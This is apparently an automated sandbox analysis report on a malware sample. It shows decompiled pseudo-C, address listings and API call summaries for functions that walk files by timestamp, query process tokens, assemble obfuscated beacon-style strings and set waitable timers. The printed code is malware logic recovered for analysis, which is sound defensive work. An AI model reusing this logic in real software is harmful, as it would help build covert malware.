				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4fdd2a4; // 0x254a5a8
				_t16 = _t93 + 0x4fde809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x04fd32c3
                                          0x04fd32c9
                                          0x04fd32cb
                                          0x04fd32e5
                                          0x04fd32e7
                                          0x04fd32ec
                                          0x04fd3561
                                          0x04fd3568
                                          0x04fd3568
                                          0x04fd32f2
                                          0x04fd3307
                                          0x04fd3309
                                          0x04fd330b
                                          0x04fd3310
                                          0x04fd3551
                                          0x04fd355b
                                          0x00000000
                                          0x04fd355b
                                          0x04fd3316
                                          0x04fd3321
                                          0x04fd3326
                                          0x04fd332b
                                          0x04fd332e
                                          0x04fd3335
                                          0x04fd333a
                                          0x04fd333f
                                          0x04fd3541
                                          0x04fd354b
                                          0x00000000
                                          0x04fd354b
                                          0x04fd3355
                                          0x04fd3359
                                          0x04fd335c
                                          0x04fd335f
                                          0x04fd3365
                                          0x04fd336a
                                          0x04fd3373
                                          0x04fd3379
                                          0x04fd3383
                                          0x04fd338a
                                          0x04fd338a
                                          0x04fd339c
                                          0x04fd33a7
                                          0x04fd33b5
                                          0x04fd33ba
                                          0x04fd33bf
                                          0x04fd33c2
                                          0x04fd33c7
                                          0x04fd33d1
                                          0x04fd33d4
                                          0x04fd33d7
                                          0x04fd33ed
                                          0x04fd33ef
                                          0x04fd33f4
                                          0x04fd353f
                                          0x00000000
                                          0x04fd353f
                                          0x04fd340b
                                          0x04fd345c
                                          0x04fd341f
                                          0x04fd3427
                                          0x04fd342c
                                          0x04fd343a
                                          0x04fd3443
                                          0x04fd344c
                                          0x04fd344c
                                          0x04fd345a
                                          0x04fd345a
                                          0x04fd3460
                                          0x04fd3464
                                          0x04fd3464
                                          0x04fd346a
                                          0x00000000
                                          0x00000000
                                          0x04fd346c
                                          0x04fd3472
                                          0x04fd3519
                                          0x04fd351c
                                          0x04fd3529
                                          0x04fd3529
                                          0x04fd352d
                                          0x00000000
                                          0x00000000
                                          0x04fd3522
                                          0x04fd3526
                                          0x04fd3526
                                          0x04fd3528
                                          0x04fd3528
                                          0x04fd3532
                                          0x04fd3539
                                          0x04fd353b
                                          0x00000000
                                          0x04fd353b
                                          0x04fd3478
                                          0x04fd347a
                                          0x04fd347a
                                          0x04fd348d
                                          0x04fd3493
                                          0x04fd349e
                                          0x04fd34a0
                                          0x04fd34a4
                                          0x04fd34a6
                                          0x04fd34a6
                                          0x04fd34ab
                                          0x04fd34ad
                                          0x04fd34ad
                                          0x04fd34ab
                                          0x04fd34b2
                                          0x04fd34b6
                                          0x04fd34b6
                                          0x04fd34c6
                                          0x04fd34cb
                                          0x04fd34ce
                                          0x04fd34ce
                                          0x04fd34d1
                                          0x04fd34db
                                          0x04fd34e3
                                          0x04fd34e8
                                          0x04fd34f6
                                          0x04fd34f6
                                          0x04fd350a
                                          0x04fd350e
                                          0x04fd350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04FD32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04FD3307
                                          • memset.NTDLL ref: 04FD3321
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04FD333A,73797325), ref: 04FD77F7
                                            • Part of subcall function 04FD77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04FD7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04FD335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04FD3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04FD338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04FD3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04FD33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD340B
                                          • FindNextFileA.KERNELBASE(04FD207E,?), ref: 04FD341F
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04FD348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04FD34C6
                                          • FindNextFileA.KERNELBASE(04FD207E,?), ref: 04FD34DB
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04FD34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04FD3504
                                          • FindClose.KERNEL32(04FD207E), ref: 04FD3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04FD354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD355B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: e820ba349f9420ae21aeaf0dc7bad25fbd2562855d070c97ac85981afb477ed9
                                          • Instruction ID: c532adf012bf3af205c69641b3d9c462a90447ba18ef9a6d969cccf0d16e474f
                                          • Opcode Fuzzy Hash: e820ba349f9420ae21aeaf0dc7bad25fbd2562855d070c97ac85981afb477ed9
                                          • Instruction Fuzzy Hash: 4C814D72D00119AFDF11DFA4DC88AEEBBBAFF44300F144169EA05E7250D739AA45CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD71B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04FD71B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04FD58BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04FD147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x04fd71c6
                                          0x04fd71c7
                                          0x04fd71c8
                                          0x04fd71c9
                                          0x04fd71ca
                                          0x04fd71ce
                                          0x04fd71d5
                                          0x04fd71e4
                                          0x04fd71e7
                                          0x04fd71ea
                                          0x04fd71f1
                                          0x04fd71f4
                                          0x04fd71f7
                                          0x04fd71fa
                                          0x04fd71fd
                                          0x04fd7208
                                          0x04fd720a
                                          0x04fd7213
                                          0x04fd721b
                                          0x04fd721d
                                          0x04fd722f
                                          0x04fd7239
                                          0x04fd723d
                                          0x04fd724c
                                          0x04fd7250
                                          0x04fd7259
                                          0x04fd7261
                                          0x04fd7261
                                          0x04fd7263
                                          0x04fd7263
                                          0x04fd726b
                                          0x04fd7271
                                          0x04fd7275
                                          0x04fd7275
                                          0x04fd7280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04FD7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04FD7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04FD722F
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04FD724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04FD7259
                                          • NtClose.NTDLL(?), ref: 04FD726B
                                          • NtClose.NTDLL(00000000), ref: 04FD7275
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: d7e1c58278dea2b7ada66a3cd207634ef08de1f89917bf4eee8a3f8e05f57bdf
                                          • Instruction ID: c985c5d9120cbc031884eeb2c0c14c902d5a55b0e443f27eb490c770ef95ce68
                                          • Opcode Fuzzy Hash: d7e1c58278dea2b7ada66a3cd207634ef08de1f89917bf4eee8a3f8e05f57bdf
                                          • Instruction Fuzzy Hash: DF21E6B290022CBBDF01AFA5DD859DEBFBEEF48740F144026FA00A6150D7759A45EFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04FD1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x4fdd018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x4fdd014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x4fdd010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x4fdd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x4fdd2a4; // 0x254a5a8
				_t3 = _t65 + 0x4fde633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4fdd02c,  *0x4fdd004, _t60);
				_t68 = E04FD57AB();
				_t69 =  *0x4fdd2a4; // 0x254a5a8
				_t4 = _t69 + 0x4fde673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E04FD73E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x4fdd2a4; // 0x254a5a8
					_t7 = _t130 + 0x4fde8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x4fdd238, 0, _v8);
				}
				_t74 = E04FD614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x4fdd2a4; // 0x254a5a8
					_t11 = _t125 + 0x4fde8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x4fdd238, 0, _v8);
				}
				_t150 =  *0x4fdd324; // 0x75295b0
				_t76 = E04FD757B(0x4fdd00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0x4fdd238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x4fdd238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x4fdd238, _t156, _v20);
						goto L26;
					}
					E04FD749F(GetTickCount());
					_t83 =  *0x4fdd324; // 0x75295b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x4fdd324; // 0x75295b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x4fdd324; // 0x75295b0
					_t152 = E04FD4D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x4fdd238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x4fdc294);
					_t95 =  *0x4fdd2a4; // 0x254a5a8
					_push(_t152);
					_t18 = _t95 + 0x4fde252; // 0x616d692f
					_t97 = E04FD9DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x4fdd238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E04FDA5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E04FD6106();
						L22:
						HeapFree( *0x4fdd238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E04FD2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E04FDA060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04FD147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E04FD1600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04FD147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x04fd1754
                                          0x04fd1754
                                          0x04fd1754
                                          0x04fd175d
                                          0x04fd1766
                                          0x04fd1768
                                          0x04fd1768
                                          0x04fd1775
                                          0x04fd1780
                                          0x04fd1783
                                          0x04fd1788
                                          0x04fd1791
                                          0x04fd1794
                                          0x04fd1799
                                          0x04fd179c
                                          0x04fd17a1
                                          0x04fd17a4
                                          0x04fd17b0
                                          0x04fd17bd
                                          0x04fd17bf
                                          0x04fd17c5
                                          0x04fd17ca
                                          0x04fd17d5
                                          0x04fd17d7
                                          0x04fd17da
                                          0x04fd17dc
                                          0x04fd17e1
                                          0x04fd17e7
                                          0x04fd17ec
                                          0x04fd17ef
                                          0x04fd17f4
                                          0x04fd1801
                                          0x04fd1803
                                          0x04fd1809
                                          0x04fd1813
                                          0x04fd1813
                                          0x04fd1815
                                          0x04fd181a
                                          0x04fd181f
                                          0x04fd1822
                                          0x04fd1827
                                          0x04fd1834
                                          0x04fd1836
                                          0x04fd1844
                                          0x04fd1844
                                          0x04fd1846
                                          0x04fd1854
                                          0x04fd1859
                                          0x04fd185b
                                          0x04fd1860
                                          0x04fd1a2f
                                          0x04fd1a39
                                          0x04fd1a42
                                          0x04fd1866
                                          0x04fd1872
                                          0x04fd1878
                                          0x04fd187d
                                          0x04fd1a23
                                          0x04fd1a2d
                                          0x00000000
                                          0x04fd1a2d
                                          0x04fd1889
                                          0x04fd188e
                                          0x04fd1897
                                          0x04fd18a8
                                          0x04fd18ac
                                          0x04fd18b5
                                          0x04fd18bb
                                          0x04fd18ca
                                          0x04fd18d1
                                          0x04fd18da
                                          0x04fd18e0
                                          0x04fd1a17
                                          0x04fd1a21
                                          0x00000000
                                          0x04fd1a21
                                          0x04fd18ec
                                          0x04fd18f2
                                          0x04fd18f7
                                          0x04fd18f8
                                          0x04fd18ff
                                          0x04fd1904
                                          0x04fd1909
                                          0x04fd1a0d
                                          0x04fd1a15
                                          0x00000000
                                          0x04fd1a15
                                          0x04fd1912
                                          0x04fd1919
                                          0x04fd1921
                                          0x04fd1926
                                          0x04fd192f
                                          0x04fd1935
                                          0x04fd193c
                                          0x04fd1941
                                          0x04fd1946
                                          0x04fd1a45
                                          0x04fd19f9
                                          0x04fd19f9
                                          0x04fd19fe
                                          0x04fd1a09
                                          0x04fd1a0b
                                          0x00000000
                                          0x04fd1a0b
                                          0x04fd1950
                                          0x04fd1955
                                          0x04fd195a
                                          0x04fd195f
                                          0x04fd196a
                                          0x04fd196f
                                          0x04fd1972
                                          0x04fd1978
                                          0x04fd197e
                                          0x04fd1984
                                          0x04fd1987
                                          0x04fd198d
                                          0x04fd1990
                                          0x04fd1995
                                          0x04fd1999
                                          0x04fd1999
                                          0x04fd19a5
                                          0x04fd19b1
                                          0x04fd19b5
                                          0x04fd19b7
                                          0x04fd19bc
                                          0x04fd19be
                                          0x04fd19c3
                                          0x04fd19c8
                                          0x04fd19d5
                                          0x04fd19dd
                                          0x04fd19e0
                                          0x04fd19e0
                                          0x04fd19bc
                                          0x00000000
                                          0x04fd19a7
                                          0x04fd19ab
                                          0x04fd19e2
                                          0x04fd19e5
                                          0x04fd19ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04fd19ee
                                          0x04fd19ad
                                          0x00000000
                                          0x04fd19ad
                                          0x04fd19a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD1768
                                          • wsprintfA.USER32 ref: 04FD17B8
                                          • wsprintfA.USER32 ref: 04FD17D5
                                          • wsprintfA.USER32 ref: 04FD1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1813
                                          • wsprintfA.USER32 ref: 04FD1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD1872
                                          • GetTickCount.KERNEL32 ref: 04FD1883
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD1897
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD18B5
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD4D2C: strcpy.NTDLL ref: 04FD4D76
                                            • Part of subcall function 04FD4D2C: lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                          • StrTrimA.SHLWAPI(00000000,04FDC294,?,075295B0), ref: 04FD18EC
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                            • Part of subcall function 04FD9DEF: lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD1919
                                          • lstrcpy.KERNEL32(?,?), ref: 04FD1921
                                          • lstrcat.KERNEL32(?,?), ref: 04FD192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04FD1935
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                          • wcstombs.NTDLL ref: 04FD19C8
                                            • Part of subcall function 04FDA060: SysAllocString.OLEAUT32(?), ref: 04FDA09B
                                            • Part of subcall function 04FDA060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04FDA11E
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04FD1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04FD1A15
                                          • HeapFree.KERNEL32(00000000,?,?,075295B0), ref: 04FD1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04FD1A39
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: d76e755c44b2a87a84e914a67ef4cc3e54c6906dacaf5be1467ca6efb99244d4
                                          • Instruction ID: 8b1065bafad7b454c1fc8ae6d9bf8a925030c1d32a4931692b0688ddb3ac5368
                                          • Opcode Fuzzy Hash: d76e755c44b2a87a84e914a67ef4cc3e54c6906dacaf5be1467ca6efb99244d4
                                          • Instruction Fuzzy Hash: 87913971901109AFDB11EFA4ED88A9E7BBAEF49314F184164F408D7260D739ED52DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4fd9b6f-4fd9ba1 memset CreateWaitableTimerA 98 4fd9ba7-4fd9c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 4fd9d23-4fd9d29 GetLastError 97->99 101 4fd9c8b-4fd9c91 98->101 102 4fd9c06-4fd9c09 98->102 100 4fd9d2d-4fd9d37 99->100 103 4fd9c92-4fd9c96 101->103 104 4fd9c0b call 4fd68cf 102->104 105 4fd9c14 102->105 106 4fd9c98-4fd9ca0 HeapFree 103->106 107 4fd9ca6-4fd9caa 103->107 110 4fd9c10-4fd9c12 104->110 109 4fd9c1e 105->109 106->107 107->103 111 4fd9cac-4fd9cb6 CloseHandle 107->111 112 4fd9c22-4fd9c27 109->112 110->105 110->109 111->100 113 4fd9c29-4fd9c30 112->113 114 4fd9c3a-4fd9c68 call 4fd9f11 112->114 113->114 116 4fd9c32 113->116 118 4fd9cb8-4fd9cbd 114->118 119 4fd9c6a-4fd9c75 114->119 116->114 121 4fd9cdc-4fd9ce4 118->121 122 4fd9cbf-4fd9cc5 118->122 119->112 120 4fd9c77-4fd9c87 call 4fd54ac 119->120 120->101 123 4fd9cea-4fd9d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->123 122->101 125 4fd9cc7-4fd9cda call 4fd6106 122->125 123->112 126 4fd9d1e 123->126 125->123 126->101
                                          C-Code - Quality: 83%
                                          			E04FD9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4fdd240);
					_v76 = 0;
					_v80 = 0;
					L04FDB088();
					_v84.LowPart = _t46;
					_v80 = _t75;
